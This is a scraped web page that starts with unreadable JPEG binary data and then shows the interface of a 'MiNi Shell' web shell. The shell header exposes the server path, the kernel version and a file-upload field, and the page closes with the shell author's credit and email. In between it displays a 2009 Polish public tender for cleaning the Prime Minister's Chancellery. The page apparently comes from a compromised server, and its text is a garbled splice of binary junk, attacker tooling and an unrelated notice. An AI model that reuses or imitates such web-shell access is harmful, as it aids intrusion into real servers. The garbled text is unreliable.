JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090924/163129-N-2009.html

<p class="kh_header"><b>Warszawa: Wykonywanie usługi kompleksowego sprzątania skrzydła B siedziby Kancelarii Prezesa Rady Ministrów za wyjątkiem gabinetów ministrów</b><br>
<b>Numer ogłoszenia: 163129 - 2009; data zamieszczenia: 24.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Obsługi Kancelarii Prezesa Rady Ministrów , ul. Powsińska 69/71, 02-903 Warszawa, woj. mazowieckie, tel. 022 6946043,6947628, faks 022 6946043, 6947204,6949645.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> cokprm.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gospodarstwo Pomocnicze KPRM.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usługi kompleksowego sprzątania skrzydła B siedziby Kancelarii Prezesa Rady Ministrów za wyjątkiem gabinetów ministrów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonywanie usługi kompleksowego sprzątania skrzydła B siedziby Kancelarii Prezesa Rady Ministrów za wyjątkiem gabinetów ministrów. 
1.	Sprzątanie będzie podzielone na dwa etapy:
Etap I - sprzątanie całościowe, codziennie od godziny 600 do godziny 1000;
Etap II - dyżur sprzątający codziennie od godziny 1000 do godziny 1800.
2.	Powierzchnia podlegająca sprzątaniu wynosi 6 857m2, obejmuje ona pokoje, pomieszczenia techniczne (socjalne), toalety, korytarze, klatki schodowe.
3.	Rodzaje podłóg w poszczególnych pomieszczeniach:
a)	Rodzaj podłóg w pomieszczeniach - klepka
b)	Rodzaj podłóg na korytarzach - parter - płyta marmurowa, pozostałe piętra - klepka 
c)	Rodzaj podłóg w toaletach - terrakota
d)	Rodzaj podłóg na klatkach schodowych - gres 
e)	Rodzaj podłogi w pomieszczeniach technicznych - gres, wykładzina antystatyczna
4.	Wymagane maszyny specjalistyczne:
a)	Minimum jedna szorowarka;
b)	Minimum jedno urządzenie czyszczące ciśnieniowo - parowe.
5.	Środki czyszczące
Zapewniamy ręczniki papierowe, papier toaletowy i mydło, natomiast pozostałe środki czyszczące mają być własnością firmy sprzątającej.
6.	W ramach sprzątania przewidziane jest również 4-krotne mycie okien o powierzchni ok. 615m2, w ciągu roku.
7.	Zamawiający przewiduje, iż podpisana umowa będzie obowiązywała do 13 kwietnia 2011 r.
8.	Przed terminem składania ofert do niniejszego postępowania dla wykonawców, którzy zostaną zaproszeni do składania ofert zostanie zorganizowana wizja lokalna celem umożliwienia uzyskania wszelkich informacji dotyczących przedmiotu zamówienia. Całkowita wartość zamówienia jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy Prawo zamówień publicznych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.92.00-4, 90.91.13.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 19.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje żądania wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają warunki określone 
w art. 22 ust.1 ustawy, tj.: 
1)	Posiadają uprawnienia do wykonywania działalności będącej przedmiotem zamówienia, 
2)	Posiadają niezbędną wiedzę i doświadczenie, tj. Wykonawca zobowiązany jest wykazać, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (w przypadku świadczeń okresowych lub ciągłych uwzględniane są również nadal wykonywane), wykonał co najmniej trzy usługi o wartości, min. 100.000,00 zł. rocznie każda, polegające na sprzątaniu obiektów, w tym min. dwa obiekty biurowe o powierzchni minimum 2000m2,
3)	dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, tj. Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował: 
a)	co najmniej 5-cioma pracownikami sprzątającymi z poświadczeniem bezpieczeństwa wydanym przez krajowe władze bezpieczeństwa, upoważniającym do dostępu do informacji niejawnych, stanowiących tajemnicę państwową - do poziomu tajne;
4)	dysponują lub będą dysponować potencjałem technicznym, tj. Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował niezbędnymi do wykonania zamówienia następującymi narzędzi i urządzeniami:
a)	co najmniej jedną szorowarką;
b)	co najmniej jedno urządzenie czyszczące ciśnieniowo - parowe;
5)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
a)	Wykonawca zobowiązany jest wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 300.000zł.
6)	Nie podlegają wykluczeniu z postępowania.
Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: 
Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły spełnia - nie spełnia. Zamawiający przyzna po 1 punkcie za każdą wykazaną usługę spełniającą wyżej wymienione warunki. Zamawiający spośród wykonawców, którzy spełniają wszystkie warunki udziału w postępowaniu wyłoni 5 wykonawców, którzy wykażą największą ilość usług. 
W przypadku wykazania przez wykonawców takiej samej ilości usług zamawiający wyłoni 5 i każdego następnego wykonawcę, który wykazał taką samą ilość usług jak ostatni zakwalifikowany..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na potwierdzenie spełnienia warunków udziału w postępowaniu wykonawca złoży, wraz z wnioskiem o dopuszczenie do udziału w przetargu ograniczonym (wzór wniosku znajduje się na stronie internetowej www.cokprm.gov.pl przy ogłoszeniu o zamówieniu), niżej wymienione dokumenty:
1)	Oryginał oświadczenia o nie podleganiu wykluczeniu z postępowania zgodnie z art. 22 ust. 1 pkt 4 ustawy (wzór oświadczenia znajduje się na stronie internetowej www.cokprm.gov.pl przy ogłoszeniu o zamówieniu)
2)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków. 
3)	Wykaz minimum trzech usług o wartości min. 100 000,00zł brutto rocznie każda, wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegające na sprzątaniu obiektów, w tym min. dwa obiekty biurowe o powierzchni minimum 2000m2, z podaniem nazwy usługi jej zakresu, dat i miejsc wykonania, oraz wartości (wzór wykazu znajduje się na stronie internetowej www.cokprm.gov.pl przy ogłoszeniu o zamówieniu). Do wykazu należy załączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie. Wykonawca nie może być wystawcą dokumentów potwierdzających należyte wykonanie zamówienia;
4)	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (wzór wykazu znajduje się na stronie internetowej www.cokprm.gov.pl przy ogłoszeniu o zamówieniu):
5)	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 4, Wykonawca wskazał osoby, którymi będzie dysponował;
6)	Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane kwalifikacje.
7)	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował Wykonawca, (wzór wykazu znajduje się na stronie internetowej www.cokprm.gov.pl przy ogłoszeniu o zamówieniu);
8)	pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 1.7 Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował
9)	Aktualną polisę lub inny dokument ubezpieczeniowy potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 300.000 zł.
2. Wykonawcy zagraniczni
1)	Wykonawca zagraniczny (mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej) zamiast dokumentu wskazanego w ust. 1 pkt 2) - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków,
2)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentu Wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datą wymaganą dla tych dokumentów.
3. Zasady udziału w postępowaniu wykonawców występujących wspólnie.
1)	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu stosownie do art. 23 ust. 2 ustawy Prawo zamówień publicznych. 
2)	Wykonawcy, o których mowa w pkt 1, składają jeden wniosek, przy czym: 
a)	wymagane oświadczenia i dokumenty wskazane w ust. 1 pkt 1 i 2 składa osobno każdy z Wykonawców, 
b)	pozostałe oświadczenia i dokumenty wskazane w ust. 1, pkt 3 - 9 składa przynajmniej jeden Wykonawca, który spełnia warunki lub wykonawcy wspólnie.
4. Forma oświadczeń lub dokumentów
1)	Wymagane oświadczenia i dokumenty powinny być złożone w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy (z wyłączeniem: oświadczenia o spełnieniu warunków udziału w postępowaniu, które musi być złożone w oryginale oraz pełnomocnictwa, którym mowa poniżej).
2)	Za osoby uprawnione do reprezentowania Wykonawcy uznaje się osoby upoważnione do reprezentowania Wykonawcy wskazane we właściwym rejestrze lub ewidencji działalności gospodarczej, bądź w stosownym pełnomocnictwie, które należy załączyć do wniosku w oryginale lub kopii poświadczonej notarialnie.
3)	W przypadku, gdy załączone do wniosku oświadczenia, dokumenty zostały sporządzone w języku obcym (w tym dokumenty składane przez Wykonawcę zagranicznego) Zamawiający wymaga przedstawienia ich tłumaczenia na język polski poświadczonego przez Wykonawcę. Jeżeli złożone kserokopie oświadczeń i dokumentów wskazanych w ust. 1 do 3 będą nieczytelne lub będą budzić wątpliwości, co do ich prawdziwości, Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wykonawcy otrzymają SIWZ wraz z zaproszeniem do składania ofert.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2009 godzina 11:00, miejsce: CENTRUM OBSŁUGI KPRM, Warszawa, 
ul. Powsińska 69/71 pokój 303..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com